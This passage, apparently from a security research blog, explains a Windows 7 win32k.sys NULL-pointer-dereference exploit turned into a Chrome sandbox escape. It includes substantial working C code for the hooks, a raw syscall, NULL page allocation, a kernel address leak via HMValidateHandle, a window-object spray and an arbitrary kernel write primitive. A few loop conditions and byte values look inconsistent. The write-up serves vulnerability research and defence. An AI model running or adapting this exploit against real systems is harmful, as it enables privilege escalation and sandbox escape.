this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed. SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId()); SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,hInst,DisplayEventProc,GetCurrentProcessId(),GetCurrentThreadId(),0); The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook. Window message call flow before and after setting the WH_CALLWNDPROC hook Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL. hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr); hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain‘s window procedure to DefWindowProc() which is a function in the Windows API responsible for handling any window messages not handled by the window itself. The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally the last parameters for CreateWindowA() ensure that the window is positioned at (0x1, 0x1), and that the window is 0 pixels by 0 pixels big. This can be seen in the code below. WNDCLASSEXA wndClass = { 0 }; wndClass.cbSize = sizeof(WNDCLASSEXA); wndClass.lpfnWndProc = DefWindowProc; wndClass.cbClsExtra = 0; wndClass.cbWndExtra = 0; wndClass.hInstance = hInst; wndClass.lpszMenuName = 0; wndClass.lpszClassName = "WNDCLASSMAIN"; RegisterClassExA(&wndClass); hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr); TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL); MSG msg = { 0 }; while (GetMessageW(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessageW(&msg); if (iMenuCreated >= 1) { bOnDraging = TRUE; callNtUserMNDragOverSysCall(&pt, buf); break; } } After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain‘s message stack, which will be retrieved in main()‘s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain‘s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc(). BOOL bOnDraging = FALSE; .... LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam) { tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam; if (!bOnDraging) { return CallNextHookEx(0, code, wParam, lParam); } .... As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause a EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hook and will cause execution to be diverted to the function DisplayEventProc(). UINT iMenuCreated = 0; VOID CALLBACK DisplayEventProc(HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime) { switch (iMenuCreated) { case 0: SendMessageW(hwnd, WM_LBUTTONDOWN, 0, 0x00050005); break; case 1: SendMessageW(hwnd, WM_MOUSEMOVE, 0, 0x00060006); break; } printf("[*] MSG\n"); iMenuCreated++; } Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LMOUSEBUTTON window message to hWndMainusing SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain‘s window message queue, iMenuCreated is incremented. hWndMain then processes the WM_LMOUSEBUTTON message and selects hMenu, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time around the second case is executed as iMenuCreated is now 1. This case will use SendMessageW() to move the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag and drop operation is being performed. Following this iMenuCreated is incremented once again and execution returns to the following code with the message loop inside main(). CHAR buf[0x100] = { 0 }; POINT pt; pt.x = 2; pt.y = 2; ... if (iMenuCreated >= 1) { bOnDraging = TRUE; callNtUserMNDragOverSysCall(&pt, buf); break; } Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf. callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated. void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) { _asm { mov eax, 0x11ED push address2 push address1 mov edx, esp int 0x2E pop eax pop eax } } NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object. LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt) { .... v6 = xxxSendMessage( var_pPopupMenu->spwndNextPopup, MN_FINDMENUWINDOWFROMPOINT, (WPARAM)&pPopupMenu, (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the // MN_FINDMENUWINDOWFROMPOINT usermode callback // using the address of pPopupMenu as the // wParam argument. ThreadUnlock1(); if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user // mode callback is a handle to a MFMWFP window. v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned // handle is a handle to // a window object. Set v1 to // TRUE if all is good. ... When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed. if ((cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT)) { bIsDefWndProc = FALSE; printf("[*] HWND: %p \n", cwp->hwnd); SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (ULONG64)SubMenuProc); } return CallNextHookEx(0, code, wParam, lParam); This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc(). Once the hook exits, hWndMain‘s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function. SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This will prevent the application becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, or the handle to the window that was created using the menu class string. LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { if (msg == WM_MN_FINDMENUWINDOWFROMPOINT) { SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc); return (ULONG)hWndFakeMenu; } return DefWindowProc(hwnd, msg, wParam, lParam); } Since hWndFakeMenu is a valid window handle it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL as CreateWindowEx() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex(). MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu‘s spMenu field. However since hWndFakeMenu‘s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated. tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu) { tagITEM *result; // eax if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ){ // NULL pointer dereference will occur // here if spMenu is NULL. result = 0; else result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu; return result; } Sandbox Limitations To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below: All processes in the Chrome sandbox run at Low Integrity. A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things. Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation. On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys. The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog. The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog. The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates. Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows. Sandbox Exploit Explanation Creating a DLL for the Chrome Sandbox As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files. To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files. Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one. Explanation of the Existing Limited Write Primitive Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections. Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below: void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet) { ... var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write // operation should occur, minus an // offset of 0x4. temp_var_PITEM = var_PITEM; if ( var_PITEM ) { ... var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the // address where the second write operation // should occur, minus an offset of 0x4. This // address will be 0x6C bytes earlier in // memory than the address in var_PITEM. if ( fSet ) { *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the // attacker controlled address. if ( var_PITEM_Minus_Offset_Of_0x6C ) { *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; // Conduct the second write to the attacker // controlled address minus 0x68 (0x6C-0x4). ... xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted. It is also important to note is that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there. It is also important to note that even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best. From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections. Allocating the NULL Page On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory. Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then then rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0. typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect ); NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0; .... pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"); .... // Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for // explaining this in an example along with the finer details that are often forgotten. bool allocateNullPage() { /* Set the base address at which the memory will be allocated to 0x1. This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory, however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/ PVOID BaseAddress = (PVOID)0x1; /* Set the size to be allocated to 40960 to ensure that there is plenty of memory allocated and available for use. */ SIZE_T size = 40960; /* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size specified in the variable size. Also make sure the memory is allocated with read, write, and execute permissions.*/ NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); // If the call to NtAllocateVirtualMemory failed, return FALSE. if (result != 0x0) { return FALSE; } // If the code reaches this point, then everything went well, so return TRUE. return TRUE; } Finding the Address of HMValidateHandle Once the NULL page has been allocated the exploit will then obtain the address of the HMValidateHandle() function. HMValidateHandle() is useful for attackers as it allows them to obtain a userland copy of any object provided that they have a handle. Additionally this leak also works at Low Integrity on Windows versions prior to Windows 10 RS4. By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them. As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot directly obtain the address of HMValidateHandle() via user32.dll‘s export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the value of the offset within the indirect jump, and then perform some math to calculate the true address of HMValidateHandle(). This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xEB within IsMenu()‘s code, which signals the start of an indirect call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the indirect call, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code. HMODULE hUser32 = LoadLibraryW(L"user32.dll"); LoadLibraryW(L"gdi32.dll"); // Find the address of HMValidateHandle using the address of user32.dll if (findHMValidateHandleAddress(hUser32) == FALSE) { printf("[!] Couldn't locate the address of HMValidateHandle!\r\n"); ExitProcess(-1); } ... BOOL findHMValidateHandleAddress(HMODULE hUser32) { // The address of the function HMValidateHandleAddress() is not exported to // the public. However the function IsMenu() contains a call to HMValidateHandle() // within it after some short setup code. The call starts with the byte \xEB. // Obtain the address of the function IsMenu() from user32.dll. BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu"); if (pIsMenuFunction == NULL) { printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n"); return FALSE; } else { printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction); } // Search for the location of the \xEB byte within the IsMenu() function // to find the start of the indirect call to HMValidateHandle(). unsigned int offsetInIsMenuFunction = 0; BOOL foundHMValidateHandleAddress = FALSE; for (unsigned int i = 0; i > 0x1000; i++) { BYTE* pCurrentByte = pIsMenuFunction + i; if (*pCurrentByte == 0xE8) { offsetInIsMenuFunction = i + 1; break; } } // Throw error and exit if the \xE8 byte couldn't be located. if (offsetInIsMenuFunction == 0) { printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n"); return FALSE; } // Output address of user32.dll in memory for debugging purposes. printf("[*] hUser32: 0x%08X\r\n", hUser32); // Get the value of the relative address being called within the IsMenu() function. unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction); printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu); // Find out how far the IsMenu() function is located from the base address of user32.dll. unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32); printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32); // Take this offset and add to it the relative address used in the call to HMValidateHandle(). // Result should be the offset of HMValidateHandle() from the start of user32.dll. unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu; printf("[*] offset: 0x%08X\r\n", offset); // Skip over 11 bytes since on Windows 10 these are not NOPs and it would be // ideal if this code could be reused in the future. pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11); printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle); return TRUE; } Creating a Arbitrary Kernel Address Write Primitive with Window Objects Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback(). A HWND table named hwndSprayHandleTable will then be created, and a loop will be conducted which will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into the hwndSprayHandle table. Once this spray is complete, two loops will be used, one nested inside the other, to obtain a userland copy of each of the tagWND objects using HMValidateHandle(). The kernel address for each of these tagWND objects is then obtained by examining the tagWND objects’ pSelf field. The kernel address of each of the tagWND objects are compared with one another until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated. /* The following definitions define the various structures needed within sprayWindows() */ typedef struct _HEAD { HANDLE h; DWORD cLockObj; } HEAD, *PHEAD; typedef struct _THROBJHEAD { HEAD h; PVOID pti; } THROBJHEAD, *PTHROBJHEAD; typedef struct _THRDESKHEAD { THROBJHEAD h; PVOID rpdesk; PVOID pSelf; // points to the kernel mode address of the object } THRDESKHEAD, *PTHRDESKHEAD; .... // Spray the windows and find two that are less than 0x3fd00 apart in memory. if (sprayWindows() == FALSE) { printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n"); ExitProcess(-1); } .... // Define the HMValidateHandle window type TYPE_WINDOW appropriately. #define TYPE_WINDOW 1 /* Main function for spraying the tagWND objects into memory and finding two that are less than 0x3fd00 apart */ bool sprayWindows() { HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray. // Create and set up the window class for the sprayed window objects. WNDCLASSEXW sprayClass = { 0 }; sprayClass.cbSize = sizeof(WNDCLASSEXW); sprayClass.lpszClassName = TEXT("sprayWindowClass"); sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed // window objects to sprayCallback(). if (RegisterClassExW(&sprayClass) == 0) { printf("[!] Couldn't register the sprayClass class!\r\n"); } // Create 0x100 windows using the sprayClass window class with the window name "spray". for (int i = 0; i < 0x100; i++) { hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL); } // For each entry in the hwndSprayHandle table... for (int x = 0; x < 0x100; x++) { // Leak the kernel address of the current HWND being examined, save it into firstEntryAddress. THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW); unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf; // Then start a loop to start comparing the kernel address of this hWND // object to the kernel address of every other hWND object... for (int y = 0; y < 0x100; y++) { if (x != y) { // Skip over one instance of the loop if the entries being compared are // at the same offset in the hwndSprayHandleTable // Leak the kernel address of the second hWND object being used in // the comparison, save it into secondEntryAddress. THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW); unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf; // If the kernel address of the hWND object leaked earlier in the code is greater than // the kernel address of the hWND object leaked above, execute the following code. if (firstEntryAddress > secondEntryAddress) { // Check if the difference between the two addresses is less than 0x3fd00. if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) { printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress); printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress); // Save the handle of secondEntryAddress into hPrimaryWindow // and its address into primaryWindowAddress. hPrimaryWindow = hwndSprayHandleTable[y]; primaryWindowAddress = secondEntryAddress; // Save the handle of firstEntryAddress into hSecondaryWindow // and its address into secondaryWindowAddress. hSecondaryWindow = hwndSprayHandleTable[x]; secondaryWindowAddress = firstEntryAddress; // Windows have been found, escape the loop. break; } } // If the kernel address of the hWND object leaked earlier in the code is less than // the kernel address of the hWND object leaked above, execute the following code. else { // Check if the difference between the two addresses is less than 0x3fd00. if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) { printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress); printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress); // Save the handle of firstEntryAddress into hPrimaryWindow // and its address into primaryWindowAddress. hPrimaryWindow = hwndSprayHandleTable[x]; primaryWindowAddress = firstEntryAddress; // Save the handle of secondEntryAddress into hSecondaryWindow // and its address into secondaryWindowAddress. hSecondaryWindow = hwndSprayHandleTable[y]; secondaryWindowAddress = secondEntryAddress; // Windows have been found, escape the loop. break; } } } } // Check if the inner loop ended and the windows were found. If so print a debug message. // Otherwise continue on to the next object in the hwndSprayTable array. if (hPrimaryWindow != NULL) { printf("[*] Found target windows!\r\n"); break; } } Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow. Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandle are destroyed using DestroyWindow() in order to release resources back to the host operating system. // Check that hPrimaryWindow isn't NULL after both the loops are // complete. This will only occur in the event that none of the 0x1000 // window objects were within 0x3fd00 bytes of each other. If this occurs, then bail. if (hPrimaryWindow == NULL) { printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n"); return FALSE; } // This loop will destroy the handles to all other // windows besides hPrimaryWindow and hSecondaryWindow, // thereby ensuring that there are no lingering unused // handles wasting system resources. for (int p = 0; p > 0x100; p++) { HWND temp = hwndSprayHandleTable[p]; if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) { DestroyWindow(temp); } } addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to // primaryWindow's cbwndExtra field. printf("[*] Destroyed spare windows!\r\n"); // Check if its possible to set the window text in hSecondaryWindow. // If this isn't possible, there is a serious error, and the program should exit. // Otherwise return TRUE as everything has been set up correctly. if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) { printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n"); return FALSE; } else { return TRUE; } The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to. To understand why tagWND objects where sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well known kernel write primitive that exists on Windows versions prior to Windows 10 RS1. As is explained in Saif Sheri and Ian Kronquist’s The Life & Death of Kernel Object Abuse paper and Morten Schenk’s Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects together in memory one after another and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, they can extend the expected length of the former tagWND’s WndExtra data field such that it thinks it controls memory that is actually controlled by the second tagWND object. The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it. Effects of adjusting the cbwndExtra field in hPrimaryWindow Once the cbwndExtra field of the first tagWND object has been overwritten, if an attacker calls SetWindowLong() on the first tagWND object, an attacker can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is called using the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as destination address for the write operation. By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique. 1: kd> dt -r1 win32k!tagWND +0x000 head : _THRDESKHEAD +0x000 h : Ptr32 Void +0x004 cLockObj : Uint4B +0x008 pti : Ptr32 tagTHREADINFO +0x00c rpdesk : Ptr32 tagDESKTOP +0x010 pSelf : Ptr32 UChar ... +0x084 strName : _LARGE_UNICODE_STRING +0x000 Length : Uint4B +0x004 MaximumLength : Pos 0, 31 Bits +0x004 bAnsi : Pos 31, 1 Bit +0x008 Buffer : Ptr32 Uint2B +0x090 cbwndExtra : Int4B ... Leaking the Address of pPopupMenu for Write Address Calculations Before continuing, lets reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows. tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu) { tagITEM *result; // eax if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL. result = 0; else result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu; return result; } Notice that on line 8 there are two components which make up the final address which is returned. These are pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which will point to offset 0x34 in the NULL page. Without the ability to determine the values of both of these items, the attacker will not be able to fully control what address is returned by MNGetpItemFromIndex(), and henceforth which address xxxMNSetGapState() writes to in memory. There is a solution for this however, which can be observed by viewing the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to set the value of the variable addressToWriteTo which is used to set the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to. LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){ printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n"); printf("[*] Restoring window procedure...\r\n"); SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc); /* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex, except wParam has been subtracted by minus 0x10. Code adjusts this below to accommodate. This is an important information leak as without this the attacker cannot manipulate the values returned from MNGetpItemFromIndex, which can result in kernel crashes and a dramatic decrease in exploit reliability. */ UINT pPopupAddressInCalculations = wParam + 0x10; // Set the address to write to to be the right bit of cbwndExtra in the target tagWND. UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4)); To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use. LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt) { .... v6 = xxxSendMessage( var_pPopupMenu->spwndNextPopup, MN_FINDMENUWINDOWFROMPOINT, (WPARAM)&pPopupMenu, (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the // MN_FINDMENUWINDOWFROMPOINT usermode callback // using the address of pPopupMenu as the // wParam argument. ThreadUnlock1(); if ( IsMFMWFPWindow(v6) ) // 